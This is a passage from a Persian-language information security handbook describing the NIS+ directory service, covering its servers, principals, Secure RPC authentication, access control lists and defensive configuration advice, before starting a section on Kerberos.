ﻫﺮ ﺩﺍﻣﻨﺔ NIS+ﺩﻗﻴﻘﹰﺎ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ١٦٦NIS+ﺩﺍﺭﺩ .ﺍﻳﻦ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ ﻛﻪ ﺣﺎﻭﻱ ﻧﺴﺨﺔ ﺍﺻﻠﻲ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ
ﺩﺍﻣﻨﺔ ﺍﺻﻠﻲ ١٦٧NIS+ﻣﻲﺑﺎﺷﺪ .ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻜﺜﻴﺮ ﺷﻮﺩ ،ﻛـﻪ ﺍﻳﻨﻜـﺎﺭ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﺣﺘـﻲ
ﺯﻣﺎﻧﻴﻜﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ﺧﺎﻣﻮﺵ ﺍﺳﺖ ﻳـﺎ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻧﻴـﺴﺖ ﺷـﺒﻜﻪ ﻫﻤﭽﻨـﺎﻥ ﻗﺎﺑـﻞ ﺍﺳـﺘﻔﺎﺩﻩ ﺑﻤﺎﻧـﺪ .ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗـﻮﺍﻥ ﺍﺯ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ NIS+ﺑﺮﺍﻱ ﺯﻳﺮﺩﺍﻣﻨﻪﻫﺎ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
ﻣﻮﺟﻮﺩﻳﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ NIS+ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ ﻣﻮﻛﻼﻥ ١٦٨NIS+ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ .ﻳﻚ ﻣﻮﻛـﻞ NIS+ﻣـﻲﺗﻮﺍﻧـﺪ ﻳـﻚ
ﻣﻴﺰﺑﺎﻥ ﻭ ﻳﺎ ﻳﻚ ﻛﺎﺭﺑﺮ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﺷﺪﻩ ﺑﺎﺷﺪ .ﻫﺮ ﻣﻮﻛﻞ NIS+ﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻭ ﻳﻚ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺩﺍﺭﺩ ﻛﻪ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ
NIS+ﺩﺭ ﺩﺍﻣﻨﻪ ﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧﺪ.
ﻛﻠﻴﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻭ ﻣﻮﻛﻼﻥ NIS+ﺍﺯ ﻃﺮﻳﻖ " - "Secure RPCﻧﺴﺨﻪﺍﻱ ﺍﺯ RPCﻛﻪ ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺗﻮﺍﺑـﻊ ﺭﺍ
ﺍﺯ ﻃﺮﻳﻖ ﺭﻣﺰﮔﺬﺍﺭﻱ DESﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻣﺤﺎﻓﻈﺖ ﻣﻲﻛﻨﺪ -ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ .ﺍﻳﻨﻜﺎﺭ ،ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺍﺳـﺘﺮﺍﻕ ﺳـﻤﻊ ﻭ
ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﻣﻘﺎﻭﻡ ﻣﻲﺳﺎﺯﺩ NIS+ .ﻫﻤﭽﻨﻴﻦ ﺑﺮ ﺳﺎﺧﺖ ﻭ ﻣﺪﻳﺮﻳﺖ ﻛﻠﻴﺪﻫﺎﻱ Secure RPCﻧﻈﺎﺭﺕ ﻣﻲﻛﻨﺪ .ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ،NIS+
ﻫﺮﻳﻚ ﺍﺯ ﺍﻋﻀﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻗﺎﺩﺭ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺍﺯ Secure RPCﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ.
ﺟﺪﻭﻟﻬﺎﻱ NIS+ﻭ ﺳﺎﻳﺮ ﻧﻜﺎﺕ ﻣﺮﺑﻮﻃﻪ
ﻛﻠﻴﺔ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ NIS+ﺩﺭ ﻗﺎﻟﺐ ﺍﺷﻴﺎ ١٦٩ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ NIS+ .ﺳﻪ ﮔﻮﻧﺔ ﺍﺳﺎﺳﻲ ﺍﺷـﻴﺎ ﺭﺍ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﻣﻲﻛﻨﺪ" .ﺟﺪﻭﻟﻬﺎ" ﺍﻃﻼﻋﺎﺕ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺭﺍ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻨﺪ" ،ﮔﺮﻭﻫﻬﺎ" ﺑﻪ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻣﻮﻛﻼﻥ NIS+ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﺑـﺮﺍﻱ ﺗـﺼﺪﻳﻖ
ﻫﻮﻳﺖ ﺁﻧﻬﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ،ﻭ "ﺩﺍﻳﺮﻛﺘﻮﺭﻱﻫﺎ" ﻇﺮﻓﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺟﺪﻭﻟﻬﺎ ،ﮔﺮﻭﻫﻬﺎ ،ﻭ ﺳﺎﻳﺮ ﺩﺍﻳﺮﻛﺘﻮﺭﻱﻫﺎﻱ ﻫـﺴﺘﻨﺪ ،ﻭ ﻳـﻚ ﺳـﺎﺧﺘﺎﺭ ﺩﺭﺧﺘـﻲ
ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ NIS+ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ NIS+
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ NIS+ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺭﺿﺎﻳﺘﺒﺨﺶ ﺑﺎﺷﺪ .ﻭﻗﺘﻲ ﻳﻚ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻣﻲﺷﻮﺩ ،ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺼﻮﺭﺕ
ﺧﻮﺩﻛﺎﺭ ﺍﺳﺘﻮﺍﺭﻧﺎﻣﺔ ﺍﻣﻨﻴﺘﻲ NIS+ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩﻩ ،ﺗﻼﺵ ﻣﻲﻛﻨﺪ ﺁﻥ ﺭﺍ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻤﺎﻳﺪ.
ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭﺍﺭﺩﺷﺪﻩ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ NIS+ﻳﻜﺴﺎﻥ ﺑﺎﺷﻨﺪ )ﻛﻪ ﻣﻌﻤﻮ ﹰﻻ ﭼﻨﻴﻦ ﺍﺳﺖ( ﺭﻭﻧﺪ keyservﻣﺮﺑﻮﻁ ﺑـﻪ NIS+ﻛﻠﻴـﺪ
ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮ ﺭﺍ ﺩﺭ ﺣﺎﻓﻈﻪ ﻧﮕﻪ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﺎﺭﺑﺮ ﺑﻪ ﻫﻤﺔ ﺧﺪﻣﺎﺕ Secure RPCﺩﺳﺘﺮﺳﻲ ﺷﺒﻪ ﻣﺴﺘﻘﻴﻢ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ
)ﺑﻌﺒﺎﺭﺕ ﺩﻳﮕﺮ ﻻﻳﺔ ﻣﻴﺎﻧﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻧﺎﻣﺮﺋﻲ ﻣﻲﺷﻮﺩ( .ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭﺍﺭﺩﺷﺪﻩ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺫﺧﻴﺮﻩﺷﺪﻩ NIS+ﻳﻜـﺴﺎﻥ ﻧﺒﺎﺷـﻨﺪ ،ﺁﻧﮕـﺎﻩ ﻛـﺎﺭﺑﺮ
Incremental Update
NIS+ Root Server
NIS+ Root Domain
NIS+ Principals
Objects
165
166
167
168
169
ﺑﺨﺶ ﭘﻨﺠﻢ
۱۶ ،NIS+ﺟﺪﻭﻝ ﺭﺍ ﺍﺯ ﭘﻴﺶ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﺪ ،ﺷﺎﻣﻞ ﺟﺪﻭﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻣﻴﺰﺑﺎﻧﻬﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ،ﭘﺮﻭﺗﻜﻠﻬـﺎ ﻭ ﺧـﺪﻣﺎﺕ ،ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻭ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ،ﮔﺮﻭﻩﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ،ﭘﺴﺘﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﻨﺪﮔﺎﻧﻪ ﻭ ﺳﺎﻳﺮ ﻣـﻮﺍﺭﺩ .ﻛـﺎﺭﺑﺮﺍﻥ ﺩﺳﺘـﺸﺎﻥ ﺑـﺮﺍﻱ ﺳـﺎﺧﺘﻦ
ﺟﺪﻭﻟﻬﺎﻱ ﺍﺿﺎﻓﻪ ﺑﺮﺍﻱ ﺧﻮﺩﺷﺎﻥ ﺑﺎﺯ ﺍﺳﺖ.
٣٣٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﻮﺭ keyloginﻭﺍﺭﺩ ﺩﺍﻣﻨـﻪ NIS+ﺷـﻮﺩ .ﻛـﺎﺭﺑﺮﺍﻥ NIS+ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﻓﺮﻣـﺎﻥ
nispasswdﻋﻮﺽ ﻣﻲﻛﻨﻨﺪ ،ﻛﻪ ﺑﺴﻴﺎﺭ ﻣﺸﺎﺑﻪ ﻓﺮﻣﺎﻥ Unix passwdﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻛﺎﺭ ﻣﻲﻛﻨﺪ.
ﻞ
ﻝ ﺩﺳﺘﺮﺳـﻲ ﻛـﻪ ﺭﺍﻫﻬـﺎﻱ ﺗﻌﺎﻣـ ﹺ
ﺍﻣﻨﻴﺖ NIS+ﺑﺎ ﻓﺮﺍﻫﻢ ﻛﺮﺩﻥ ﻳﻚ ﺍﺑﺰﺍﺭ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮﺍﻥ ،ﻭ ﺑﺎ ﺍﻳﺠﺎﺩ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘـﺮ ﹺ
ﻛﺎﺭﺑﺮﺍﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﻩ ﺑﺎ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺟﺪﺍﻭﻝ NIS+ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﻨﺪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻲﺷﻮﺩ NIS+ .ﺩﻭ ﻧﻮﻉ ﺗـﺼﺪﻳﻖ
ﻫﻮﻳﺖ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ :ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺤﻠﻲ ﺑﺮ ﺍﺳﺎﺱ ﺍﺟﺮﺍﻱ ﻳﻚ ﻓﺮﻣﺎﻥ NIS+ﺗﻮﺳﻂ UIDﺍﺳﺖ ﻭ ﺑﺼﻮﺭﺕ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﻱ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺍﺻﻠﻲ NIS+ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ،ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ DESﻧﻴﺰ ﺑﺮ ﻣﺒﻨﺎﻱ Secure RPCﺍﺳﺖ.
ﻻ ﻫﻤﺎﻥ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪﺓ ﺁﻥ ﻣﻲﺑﺎﺷﺪ )ﻣﺎﻟﻚ ﻳﻚ ﺷﻲﺀ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑـﺎ ﻓﺮﻣـﺎﻥ nischownﺗﻐﻴﻴـﺮ ﺩﺍﺩ(.
ﻫﺮ ﺷﻲﺀ NIS+ﻳﻚ "ﻣﺎﻟﻚ" ﺩﺍﺭﺩ ،ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﺍﺷﻴﺎﻱ NIS+ﻫﻤﭽﻨﻴﻦ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺍﻳﻨﻜﻪ ﻛﺪﺍﻡ ﻣﻮﻛﻞ ﺩﺍﺭﺍﻱ ﭼﻪ ﻧـﻮﻋﻲ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ
ﺑﻪ ﺷﻲﺀ ﺍﺳﺖ -ﺧﻮﺍﻧﺪﻥ ،ﺗﻐﻴﻴﺮ ،ﺍﻳﺠﺎﺩ ،ﺣﺬﻑ ،ﻳﺎ ﺍﺩﻏﺎﻡ -ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﭼﻬﺎﺭ ﻧﻮﻉ ﻣﻮﻛﻞ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳﻚ ﺷﻲﺀ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ:
ﻫﻴﭽﻜﺲ )ﺗﻘﺎﺿﺎﻫﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻧﺸﺪﻩ( ،ﻣﺎﻟﻚ ﺷﻲﺀ ،ﻣﻮﻛﻼﻧﻲ ﻛﻪ ﺑﺎ ﺷﻲﺀ ﺩﺭ ﻳﻚ ﮔﺮﻭﻩ ﻫﺴﺘﻨﺪ ،ﻭ ﻣﻮﻛﻼﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﺓ ﺩﻳﮕﺮ.
ﺟﺪﺍﻭﻝ NIS+ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺭﺩﻳﻔﻬﺎ ،ﺳﺘﻮﻧﻬﺎ ،ﻳﺎ ﺍﻗﻼﻡ ﺩﺍﺩﻩﺍﻱ ﻣﻨﻔﺮﺩ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺑﻴﺸﺘﺮ ﺑﺪﻫﻨـﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﻫﻤـﺔ
ﻛﺎﺭﺑﺮﺍﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﻩ ﺑﻪ ﻫﻤﺔ ﻗﺴﻤﺘﻬﺎﻱ ﻳﻚ ﺟﺪﻭﻝ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺍﻧﺪﻥ ﺩﺍﺭﻧﺪ ،ﺍﻣﺎ ﻫﺮ ﻛﺎﺭﺑﺮ ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧـﺪ ﺁﻥ ﺳـﻄﺮ ﺍﺯ ﺟـﺪﻭﻝ ﺭﺍ
ﻛﻪ ﺑﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ ﺍﻭ ﻣﺮﺑﻮﻁ ﺍﺳﺖ ﺗﻐﻴﻴﺮ ﺩﻫﺪ .ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺍﺯ ﺁﻧﺠﺎ ﻛـﻪ ﺩﺳﺘﺮﺳـﻴﻬﺎﻱ ﺭﺩﻳﻔﻬـﺎ ،ﺳـﺘﻮﻧﻬﺎ ،ﻭ ﺍﻗـﻼﻡ ﺩﺍﺩﻩﺍﻱ
ﻣﻨﻔﺮﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺑﺰﺭﮔﺘﺮ ﻛﻨﻨﺪ ،ﻗﻮﺍﻧﻴﻦ ﻣﺤﺪﻭﺩﻛﻨﻨﺪﺓ ﺑﻴﺸﺘﺮ ،ﻗﺎﺑﻞ ﺍﻋﻤﺎﻝ ﻧﻤﻲﺑﺎﺷﻨﺪ.
ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ NIS+
ﺍﮔﺮ NIS+ﺩﺭﺳﺖ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻣﺪﻳﺮﻳﺖ ﺷﺒﻜﻪ ﺳﻴﺴﺘﻢ ﺑﺴﻴﺎﺭ ﺍﻣﻨﻲ ﺑﺎﺷﺪ .ﺑﺎ ﺍﻳﻦ ﻭﺟـﻮﺩ ،ﻣﺜـﻞ ﻫﻤـﺔ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻳﺎ ﻣﺪﻳﺮﻳﺖ NIS+ﺍﺷﺘﺒﺎﻫﻲ ﺭﺥ ﺩﻫﺪ ﻛﻪ ﻧﺘﻴﺠﺔ ﺁﻥ ﺑﺮ ﺷﺒﻜﻪﺍﻱ ﻛﻪ NIS+
ﻼ ﻣﺴﺎﺋﻠﻲ ﺑﺮﺍﻱ ﺁﮔﺎﻫﻲ ﺫﻛﺮ ﻣﻲﺷﻮﺩ:
ﺍﺯ ﺁﻥ ﻣﺤﺎﻓﻈﺖ ﻣﻲﻛﻨﺪ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻦ ﺍﻳﻤﻨﻲ ﺑﺎﺷﺪ .ﺫﻳ ﹰ
NIS+ﺭﺍ ﺩﺭ ﺣﺎﻟﺖ ﺳﺎﺯﮔﺎﺭﻱ ١٧٠NISﺍﺟﺮﺍ ﻧﻜﻨﻴﺪ
NIS+ﺩﺍﺭﺍﻱ ﻳﻚ ﺣﺎﻟﺖ "ﺳﺎﺯﮔﺎﺭﻱ "NISﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﻥ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ NIS+ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺎ ﺳـﺮﻭﻳﺲﮔﻴﺮﻧـﺪﮔﺎﻥ NISﺍﺯ
ﺩﺭﻭﻥ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ .ﺍﮔﺮ NIS+ﺭﺍ ﺩﺭ ﺍﻳﻦ ﺣﺎﻟﺖ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﻫﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ NISﺩﺭ ﺷﺒﻜﺔ ﺷﻤﺎ )ﻭ ﺷﺎﻳﺪ ﺣﺘﻲ ﺷﺒﻜﻪﻫﺎﻱ ﺩﻳﮕﺮ( ﻗﺎﺩﺭ
ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺑﻪ ﻫﺮ ﻗﻄﻌﻪﺍﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ NIS+ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ.
ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﺍﺷﻴﺎﻱ NIS+ﺭﺍ ﺩﺭ ﻓﻮﺍﺻﻞ ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ
ﻫﻨﻮﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺮﺭﺳﻲ ﺟﺎﻣﻌﻴﺖ NIS+ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ،ﺑﻨﺎﺑﺮﺍﻳﻦ ﺟﺪﻭﻟﻬﺎﻱ ،NIS+ﺩﺍﻳﺮﻛﺘـﻮﺭﻱﻫـﺎ ،ﻭ ﮔﺮﻭﻫﻬـﺎ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﺩﺳـﺘﻲ ﻭ ﺩﺭ
ﻓﻮﺍﺻﻞ ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺑﺮﺭﺳﻲ ﺷﻮﻧﺪ .ﺩﺭ ﻣﻮﺭﺩ ﺍﺷﻴﺎﻳﻲ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻫﻴﭻ ﻳﺎ ﻫﻤﻪ ﻛﺲ ﺍﺟﺎﺯﻩ ﺗﻐﻴﻴﺮ ﺩﺍﺭﻧـﺪ ﻭ ﻫﻤﭽﻨـﻴﻦ ﺟـﺪﺍﻭﻟﻲ ﻛـﻪ ﺍﻳـﻦ ﺩﻭ
ﻃﺒﻘﻪ ﺍﺯ ﻣﻮﻛﻼﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺁﻧﻬﺎ ﺍﺷﻴﺎﻱ ﺟﺪﻳﺪ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ ﻣﺮﺍﻗﺒﺖ ﺑﻪ ﺧﺮﺝ ﺩﻫﻴﺪ.
ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ NIS+ﺭﻭﻱ ﺁﻧﻬﺎ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﺍﻳﻤﻦ ﻛﻨﻴﺪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ NIS+ﺣﺪﺍﻛﺜﺮ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ﺍﻳﻤﻦ ﺍﺳﺖ .ﺍﮔﺮ ﻣﻬﺎﺟﻤﻴﻦ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ NIS+
ﺩﺳﺘﺮﺳﻲ " "rootﭘﻴﺪﺍ ﻛﻨﻨﺪ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﻫﺮ ﺗﻐﻴﻴﺮ ﺩﻟﺨﻮﺍﻩ ﺭﺍ ﺩﺭ ﺩﺍﻣﻨﺔ NIS+ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ ،ﻛﻪ ﺍﻳﻦ ﺷﺎﻣﻞ ﺍﻳﺠﺎﺩ ﻛﺎﺭﺑﺮﺍﻥ ﺟﺪﻳﺪ ،ﺗﻐﻴﻴﺮ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ ،ﻭ ﺣﺘﻲ ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺻﻠﻲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ NIS+ﻫﻢ ﻣﻲﺷﻮﺩ.
170 NIS Compatibility Mode
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٣٣٧
ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺍﺯ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺷﻤﺎﺭﺓ NIS+ ۲ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ NIS+ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺳﻪ ﺳﻄﺢ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻧﺎﻣﻬﺎﻱ ،۱ ،۰ﻭ ۲ﻛﺎﺭ ﻛﻨﻨﺪ .ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳـﻲ ﻭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛﺎﻣـﻞ
ﺍﻣﻨﻴﺘﻲ ﺗﻨﻬﺎ ﺩﺭ ﺳﻄﺢ ۲ﻓﻌﺎﻝ ﺍﺳﺖ ،ﻭ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ NIS+ﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺳﻄﺢ ۲ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
Kerberos
ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫﺔ ۱۹۸۰ﺩﺭ ﻣﺆﺳﺴﻪ ﻓﻨﺎﻭﺭﻱ ﻣﺎﺳﺎﭼﻮﺳﺖ ) ١٧١(MITﺻﺪﻫﺎ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻗﻮﻱ ﺑﻪ ﻫﻤﺮﺍﻩ ﻧﻤﺎﻳﺸﮕﺮﻫﺎﻱ ﺑﺰﺭﮒ ،ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ
١٧٢
